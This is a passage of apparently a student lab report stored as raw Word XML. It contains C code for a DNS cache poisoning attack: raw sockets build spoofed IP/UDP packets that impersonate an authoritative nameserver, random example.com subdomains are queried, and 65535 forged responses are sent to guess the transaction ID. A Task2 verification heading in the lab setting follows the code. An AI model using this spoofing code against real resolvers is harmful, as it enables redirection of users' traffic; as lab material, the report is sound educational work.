          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>csum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(unsigned short *)buffer, sizeof(struct ipheader) + sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA39F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F351F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402C6A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98ACCE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udp-&gt;udph_chksum=check_udp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buffer, packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE39F8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36B96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86BB1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8C4BE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/*******************************************************************************8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC05CC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4B4058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94452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D10CFB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Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCF9F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C0D6C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A040A0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8007B6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58A79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C66085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5ABD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127DE0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the checksum is quite important to pass the checking integrity. You need </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417CED9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B45AD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20CDDB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2A19A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to study the algorithem and what part should be taken into the calculation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3B59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F7B340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48700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A349F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FCFB6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E87AD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62610B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D5CFC7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!!!!!If you change anything related to the calculation of the checksum, you need to re-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F8C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DC14D8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BC7E9D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F62C6F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calculate it or the packet will be dropped.!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7857E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D15F7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548E9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3B113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A10F90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82E26E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D986AC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B461B5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Here things became easier since I wrote the checksum function for you. You don't need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B94469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264716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25F944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7C9089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to spend your time writing the right checksum function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A7E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8A6E2C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556DE1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093AE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Just for knowledge purpose,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F949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113EB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430F4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21FC8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remember the seconed parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E23E8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985BFA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B17024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CBF1AA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for UDP checksum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DA59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75C16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F88A34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7ED543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ipheader_size + udpheader_size + udpData_size  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5292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4C7E50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3AB0C8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40D351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for IP checksum: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BBAD1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FEB580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29D62E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AE9227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ipheader_size + udpheader_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD3A6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165A3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A8F867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F26233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522310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C0966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657406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C4F0F8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01392E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9F747E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//construct the DNS response packet IP header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EA4F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5C62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reply_ip-&gt;iph_ihl = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0032586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676BD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455FBF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1B0349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reply_ip-&gt;iph_ver = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE09A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25171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DF4D6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DE8EF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reply_ip-&gt;iph_tos = 0; // Low delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E603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D5DB4F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EF4F85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E73449" w14:textId="4E16E18A"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reply_packetLength </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sizeof(struct ipheader) + sizeof(struct udpheader)+sizeof(struct dnsheader)+reply_l</w:t>
      </w:r>
      <w:r w:rsidR="001645F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ength); // reply_length</w:t>
      </w:r>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> == UDP_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDADE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39591D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C09E3C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273A22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reply_ip-&gt;iph_len=htons(reply_packetLength);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09219F9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9F45EB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EE34E4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13FD16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reply_ip-&gt;iph_ident = htons(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)); // we give a random number for the identification#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851A9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FE04C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AED0C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06B2B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reply_ip-&gt;iph_ttl = 110; // hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13040E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9D9E3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2CB623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F84E28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reply_ip-&gt;iph_protocol = 17; // UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F428F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CD5761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41FED5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7E17AE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Source IP address of DNS response packet, need input by the user in command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503598C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33323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reply_ip-&gt;iph_sourceip = inet_addr(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>argv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1]); //the source IP address could be 199.43.133.53 or 199.43.135.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF210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0605CA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BCE8C9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DF5541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The destination IP address of DNS response packet, need input by the user in command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A846F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DB6F2D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reply_ip-&gt;iph_destip = inet_addr(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>argv[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2]);//in my case the destination IP address is 10.0.2.21 (VM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F8AD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3CDED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E2ED57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5BF89E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constructure the DNS response packet UDP header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70191BD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E4DA2D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reply_udp-&gt;udph_srcport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53);  // source port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C80F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49BAD4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352CC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A6985C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reply_udp-&gt;udph_destport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33333);  // in this lab, the destination port number is fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3DF25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C86E5B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E27B63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48509F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reply_udp-&gt;udph_len = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>htons(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sizeof(struct udpheader)+sizeof(struct dnsheader)+reply_length); // udp_header_size + udp_payload_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBD08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1DB7A5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2BF08D3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66EA6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Calculate the checksum for integrity//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C10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C5EFF9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reply_ip-&gt;iph_chksum = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>csum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(unsigned short *)reply_buffer, sizeof(struct ipheader) + sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03811F7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A04A7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1F552F8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0C999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reply_udp-&gt;udph_chksum=check_udp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reply_buffer, reply_packetLength-sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D305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FE538F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7C6A1F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A40328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Inform the kernel do not fill up the packet structure. we will build our own...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE069C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B4691E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setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))&lt;0 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57C4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B109EC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7A8BFE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FD6684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printf("error\n");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6ADBC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17D804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6AE5B9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9FB794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exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67999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47B195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1879A9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A41412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46C7F6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15FA33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//keep send out DNS query and response until our attack is successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05ACA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BC7E0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while(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C58D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2A13A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//move the point to the beginning of the DNS packet payload, so we can change to different xxxxx.example.com (i.e. aaaaa.example.com, aaaab.example.com...etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52404FF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849C6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data</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buffer +sizeof(struct ipheader)+sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11446C5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8FCFDBB"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C9EA44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1144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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reply_buffer +sizeof(struct ipheader)+sizeof(struct udpheader)+sizeof(struct dnsheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80ED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F2A249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0ECA978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D24452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//randomly generate subdomain in the form of xxxxx.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DAF9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7C676E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int charnumber;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC01C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46C761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charnumber=1+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)%5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC6CC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1E5451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*(data+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>charnumber)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">=1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53984B7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492D77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*(reply_data+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>charnumber)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061B2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EF855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8011C8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AF31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recalculate the checksum for the UDP packet of DNS qurey packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651323C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A5166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udp-&gt;udph_chksum=check_udp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer, packetLength-sizeof(struct ipheader)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3423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0CF98CF"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472627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DD28F5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send the DNS query packet out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1AD3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3EFAC3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sendto(sd, buffer, packetLength, 0, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAE968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0D12C4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printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"packet send error %d which means %s\n",errno,strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D8AD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DE3760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A32C4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68A66F0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unsigned short int count = 65535;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF1D5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D146CD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//generate 2^16 DNS response packet, each of them has different transaction ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A13C3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B8FF36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while(count</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C79A61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1E480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660FE8E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65C7E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//set transaction ID to the current DNS response packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB272F5"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AF107E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reply_dns-&gt;query_id = count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC82BA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93EF17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 recalculate the checksum for the UDP packet of DNS response packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC1651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C50634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reply_udp-&gt;udph_chksum=check_udp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sum(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">reply_buffer, reply_packetLength-sizeof(struct ipheader)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC48C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3808216"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//send the DNS response packet out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B5BA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2C75E4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if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sendto(sd, reply_buffer, reply_packetLength, 0, (struct sockaddr *)&amp;sin, sizeof(sin)) &lt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05795A8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B92F3D7"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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>printf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"packet send error %d which means %s\n",errno,strerror(errno));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA150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1A8DBC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4A8DA7C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7694079"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BDB45F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618C13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7EB85D2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1DB622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8519E6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E37AC24"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close(sd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3CB2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0265EFC"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5B1690A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0BB87632"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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B1303"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E35326E"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r w:rsidRPr="003520BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC85B8"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C02C2ED"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70FCEB31"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1D7A2A0"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3886964A" w14:textId="77777777" w:rsidR="003520BB" w:rsidRPr="003520BB" w:rsidRDefault="003520BB" w:rsidP="003520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5909C013" w14:textId="77777777" w:rsidR="00004CF6" w:rsidRPr="00FA4BE1" w:rsidRDefault="00004CF6" w:rsidP="00004CF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46358E06" w14:textId="52FF6F24" w:rsidR="005B34AE" w:rsidRPr="00FA4BE1" w:rsidRDefault="005B34AE" w:rsidP="00004CF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宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="393318"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D70951" w14:textId="2E8D4018" w:rsidR="005B34AE" w:rsidRDefault="005B34AE" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64358C05" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="7A8D3D9C" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="17818D40" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="6014823A" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="0DD4CAD5" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="3776061A" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="5E0FB6D2" w14:textId="77777777" w:rsidR="00A20D34" w:rsidRDefault="00A20D34" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="4DA2C2A2" w14:textId="4E97E517" w:rsidR="00C06B3B" w:rsidRPr="00480A59" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00351A09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task2:</w:t>
      </w:r>
      <w:r w:rsidR="00876675">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Result Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781197EA" w14:textId="49C1A98E" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E946F15" wp14:editId="5371A487">
            <wp:extent cx="5923280" cy="3369310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="33" name="Picture 33" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.36.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3-23%20at%207.36.46%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280" cy="3369310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDEEC2" w14:textId="77777777" w:rsidR="005E77A5" w:rsidRDefault="005E77A5" w:rsidP="006D3FFA">
      <w:r>
        <w:t>screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00C06B3B">
        <w:t xml:space="preserve">1 on VM2. Configure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C06B3B">
        <w:t>named.conf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C06B3B">
        <w:t>.default-zones on VM2</w:t>
      </w:r>
    </w:p>
